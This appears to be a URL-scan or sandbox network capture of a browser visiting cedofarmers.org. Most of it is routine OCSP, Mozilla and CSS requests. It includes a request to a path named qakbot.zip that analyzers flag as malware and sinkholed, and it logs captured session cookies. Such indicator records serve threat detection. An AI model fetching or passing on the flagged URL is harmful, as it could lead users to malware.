r3.o.lencr.org/
23.36.76.226200 OK 503 B IP 23.36.76.226:0
ASN #20940 Akamai International B.V.
Hash c7a8ba48383a0e56baca8c8c41b81a04
b04c1f1e730a71f17ff639c9db697c532d4e5421
7860552382285e6eddddc5226c6f6400caa3f6fc3cb4b8a2d550c6fc653f78bb
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "7860552382285E6EDDDDC5226C6F6400CAA3F6FC3CB4B8A2D550C6FC653F78BB"
Last-Modified: Sun, 06 Nov 2022 12:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=2391
Expires: Tue, 08 Nov 2022 23:00:26 GMT
Date: Tue, 08 Nov 2022 22:20:35 GMT
Connection: keep-alive
ocsp.digicert.com/
93.184.220.29200 OK 471 B IP 93.184.220.29:0
Hash 7908acd0c083145e2b454aaeb063c236
0696647bb0a4118327f637a50ebcc21bac39d592
ffc30b68df0b33d67f31e37bbf5ae5cf4c23e1c8b8197bf76a95ee06bec4cd36
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 6364
Cache-Control: max-age=136600
Content-Type: application/ocsp-response
Date: Tue, 08 Nov 2022 22:20:35 GMT
Etag: "636a2fef-1d7"
Expires: Thu, 10 Nov 2022 12:17:15 GMT
Last-Modified: Tue, 08 Nov 2022 10:31:11 GMT
Server: ECS (ska/F704)
X-Cache: HIT
Content-Length: 471
ocsp.digicert.com/
93.184.220.29200 OK 471 B IP 93.184.220.29:0
Hash 7908acd0c083145e2b454aaeb063c236
0696647bb0a4118327f637a50ebcc21bac39d592
ffc30b68df0b33d67f31e37bbf5ae5cf4c23e1c8b8197bf76a95ee06bec4cd36
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 6364
Cache-Control: max-age=136600
Content-Type: application/ocsp-response
Date: Tue, 08 Nov 2022 22:20:35 GMT
Etag: "636a2fef-1d7"
Expires: Thu, 10 Nov 2022 12:17:15 GMT
Last-Modified: Tue, 08 Nov 2022 10:31:11 GMT
Server: ECS (ska/F704)
X-Cache: HIT
Content-Length: 471
r3.o.lencr.org/
23.36.76.226200 OK 503 B IP 23.36.76.226:0
ASN #20940 Akamai International B.V.
Hash 9a21dcd6794c5ba4178522096f695511
d731cf49db5e048d0d820d5cee03417cdd8c1c7b
c4981ce849fcfce045d1c9eeb2978767d87fcbf6087626f3d6541ec8b1938a37
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "C4981CE849FCFCE045D1C9EEB2978767D87FCBF6087626F3D6541EC8B1938A37"
Last-Modified: Sun, 06 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=12102
Expires: Wed, 09 Nov 2022 01:42:17 GMT
Date: Tue, 08 Nov 2022 22:20:35 GMT
Connection: keep-alive
content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2022-11-19-18-50-54.chain
34.160.144.191200 OK 5.3 kB URL HTTP/2 content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2022-11-19-18-50-54.chain
IP 34.160.144.191:0
File type PEM certificate\012- , ASCII text
Hash 67d5a988edcda47bc3b3b3f65d32b4b6
d4f0e0da8b3690cc7da925026d3414b68c7d954f
55e4848e3ec682e808ce7ee70950f86179c43af4f81926d826a95edfda395a78
GET /chains/remote-settings.content-signature.mozilla.org-2022-11-19-18-50-54.chain HTTP/1.1
Host: content-signature-2.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
x-amz-id-2: Ns+dhON4MlIbzDiirZjtYMnmXgrZ2ES0rAl5BiRVlaCbJE9yt1TnfkvaVM9ZjVYy5JknEZwIptU=
x-amz-request-id: 637HB8ZBZQANAMXM
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
content-length: 5348
via: 1.1 google
date: Tue, 08 Nov 2022 21:48:40 GMT
age: 1915
last-modified: Fri, 30 Sep 2022 18:50:55 GMT
etag: "67d5a988edcda47bc3b3b3f65d32b4b6"
content-type: binary/octet-stream
cache-control: public,max-age=3600
alt-svc: clear
X-Firefox-Spdy: h2
contile.services.mozilla.com/v1/tiles
34.117.237.239200 OK 12 B URL HTTP/2 contile.services.mozilla.com/v1/tiles
IP 34.117.237.239:0
File type JSON data\012- , ASCII text, with no line terminators
Hash 23e88fb7b99543fb33315b29b1fad9d6
a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
GET /v1/tiles HTTP/1.1
Host: contile.services.mozilla.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
date: Tue, 08 Nov 2022 22:20:35 GMT
content-type: application/json
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2
cedofarmers.org/tmiu/qakbot.zip
192.185.57.117301 Moved Permanently 241 B URL HTTP/1.1 cedofarmers.org/tmiu/qakbot.zip
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text
Hash 143e857dedbeba8a9afd5e4b6a4ec3c7
739291f581c628a095ae9dbb766b86c3f971ef7c
42f51bd1ae4ade0a86552ab214350f8a4f8c8de6645618d8d96cc41f47d37bbe
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /tmiu/qakbot.zip HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 301 Moved Permanently
Date: Tue, 08 Nov 2022 22:20:35 GMT
Server: Apache
Location: https://cedofarmers.org/index.php
Content-Length: 241
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
r3.o.lencr.org/
23.36.76.226200 OK 503 B IP 23.36.76.226:0
ASN #20940 Akamai International B.V.
Hash 17a694f272f175c24d486240fe3fbeb8
d9d41d9e1024dcd836c2b2fd95341736d539c606
7c99cf1bf90d0425556667f9a7c6dc7319d013a9d0f6c94baa8bc0deb49d22c7
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "7C99CF1BF90D0425556667F9A7C6DC7319D013A9D0F6C94BAA8BC0DEB49D22C7"
Last-Modified: Tue, 08 Nov 2022 22:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=21600
Expires: Wed, 09 Nov 2022 04:20:36 GMT
Date: Tue, 08 Nov 2022 22:20:36 GMT
Connection: keep-alive
ocsp.digicert.com/
93.184.220.29200 OK 471 B IP 93.184.220.29:0
Hash 2a47d129a3af5f02c654faf925c60273
9ad27ed9f4500c939260a677c12e702599b00fa9
0e031af077bf7009ffefada782407a247bbd31bddc96994c68de7bfe902bf992
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 1654
Cache-Control: max-age=126824
Content-Type: application/ocsp-response
Date: Tue, 08 Nov 2022 22:20:36 GMT
Etag: "636a1c26-1d7"
Expires: Thu, 10 Nov 2022 09:34:20 GMT
Last-Modified: Tue, 08 Nov 2022 09:06:46 GMT
Server: ECS (ska/F704)
X-Cache: HIT
Content-Length: 471
cedofarmers.org/index.php
192.185.57.117200 OK 6.1 kB URL HTTP/2 cedofarmers.org/index.php
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, ASCII text, with very long lines (535), with CRLF, LF line terminators
Hash 029b32b1c044a1137c3278212e0ebc26
a87198ef26fc15df2cc5d3c40fb45f3199cd1d97
edcb2372b5af7ec52e60e688e373910580cf796aa693e440cfad177381268c1c
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /index.php HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
HTTP/2 200 OK
cache-control: no-cache, private
date: Tue, 08 Nov 2022 22:20:36 GMT
set-cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; expires=Wed, 09-Nov-2022 00:20:36 GMT; Max-Age=7200; path=/; samesite=lax
laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D; expires=Wed, 09-Nov-2022 00:20:36 GMT; Max-Age=7200; path=/; httponly; samesite=lax
vary: Accept-Encoding
content-encoding: gzip
content-length: 6098
content-type: text/html; charset=UTF-8
server: Apache
X-Firefox-Spdy: h2
push.services.mozilla.com/
34.214.64.191101 Switching Protocols 0 B URL HTTP/1.1 push.services.mozilla.com/
IP 34.214.64.191:0
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET / HTTP/1.1
Host: push.services.mozilla.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: t82PsSWsE9ACaTUp3sNazQ==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket
HTTP/1.1 101 Switching Protocols
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: 2m01G02ZcgJtugcOBHRg603dM3c=
cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css
104.17.24.14200 OK 5.6 kB URL HTTP/2 cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css
IP 104.17.24.14:0
File type ASCII text, with very long lines (30837)
Hash 109d1ed85cd01f9cdab73a4cac5bf80d
d6c6498ad46de2d8e2008a8ff68e364ae7f16b32
8b3a74fe462f5b3c0635995fd721a60eb640e237680b0b532b96711f2823e8bc
GET /ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css HTTP/1.1
Host: cdnjs.cloudflare.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
date: Tue, 08 Nov 2022 22:20:36 GMT
content-type: text/css; charset=utf-8
content-length: 5631
access-control-allow-origin: *
cache-control: public, max-age=30672000
content-encoding: br
etag: "5eb03e5f-7918"
last-modified: Mon, 04 May 2020 16:10:07 GMT
cf-cdnjs-via: cfworker/kv
cross-origin-resource-policy: cross-origin
timing-allow-origin: *
x-content-type-options: nosniff
vary: Accept-Encoding
cf-cache-status: HIT
age: 539580
expires: Sun, 29 Oct 2023 22:20:36 GMT
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GcFHYuqnWpGqIkzL4mH7Z7vjSD8%2F7pLtm7Fdcks8yMPfuatHHpVQ0cRFc1v2AWbaV5B6kpI37FG2ftL660HzX8jofeF4WBcs4Ri92bHtsdKL%2FsXadae4GV%2BvPWRpcrQnjrHnmV3l"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=15780000
server: cloudflare
cf-ray: 7671b269fca4b4eb-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2
cedofarmers.org/css/owl.carousel.min.css
192.185.57.117200 OK 1.1 kB URL HTTP/2 cedofarmers.org/css/owl.carousel.min.css
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type ASCII text, with very long lines (3350)
Hash e95f3bc7f5a4daefb4a7c59bf8f346d6
393cd6eb55cb32c8932a8c6d1a6c2b249ae51629
9e27608f367fb404f42a20c441190981860399a8efbb54b30cdb56a8e7e191da
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /css/owl.carousel.min.css HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 1098
content-type: text/css
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/css/open-iconic-bootstrap.min.css
192.185.57.117200 OK 2.0 kB URL HTTP/2 cedofarmers.org/css/open-iconic-bootstrap.min.css
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type ASCII text, with very long lines (9467), with no line terminators
Hash 1a49150e9f9aec5c1fe7943c7368e096
065b59678676666e6509b064bcc576eb4bec6aa1
6e94ff0f08e65917674594e6e5b98d707a96a427003598c26f0ab537318abac7
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /css/open-iconic-bootstrap.min.css HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 2034
content-type: text/css
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/css/slide.css
192.185.57.117200 OK 516 B URL HTTP/2 cedofarmers.org/css/slide.css
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Hash 026248c5259afb78149df842131c47ab
0a8a946962d23bb631fe7d4d192f7b7539dbf3b7
92f5e24d85a907f8ad1ba478ba86c417c5fca3a06719481adacea0bce3431656
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /css/slide.css HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 19 Jun 2021 18:42:50 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 516
content-type: text/css
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/css/owl.theme.default.min.css
192.185.57.117200 OK 446 B URL HTTP/2 cedofarmers.org/css/owl.theme.default.min.css
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Hash 829abaf1a058dee8d1c923200a574f17
8acb6c114c4650ffa90f120d35061545c09b64e0
380a836084c2489b0ba6266d630d9cd26b12a2f3151ce0d7ce11f7de5377d0f3
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /css/owl.theme.default.min.css HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 446
content-type: text/css
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/css/magnific-popup.css
192.185.57.117200 OK 2.2 kB URL HTTP/2 cedofarmers.org/css/magnific-popup.css
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Hash 757c165194bdd1de4ca4a38bfea220f7
c1d4a88790cd476995d9a5ff7db8de77cc39c5d0
772675dc2c0403949be38fc53d785d9124fad348324d0be6a75c174800afa8ea
Analyzer Verdict Alert mnemonic_dns Sinkholed
quad9 Sinkholed
GET /css/magnific-popup.css HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 2191
content-type: text/css
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/css/animate.css
192.185.57.117200 OK 7.3 kB URL HTTP/2 cedofarmers.org/css/animate.css
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Hash c7a2b713e689dcbcba933282930c18df
07d6bab3d164902128825ea44e6c408b1b9f1bcc
ba217008e30851184739f646cb37a0a9a8e8b0b5ccd9a426c4a8a6a7c5ea6105
Analyzer Verdict Alert mnemonic_dns Sinkholed
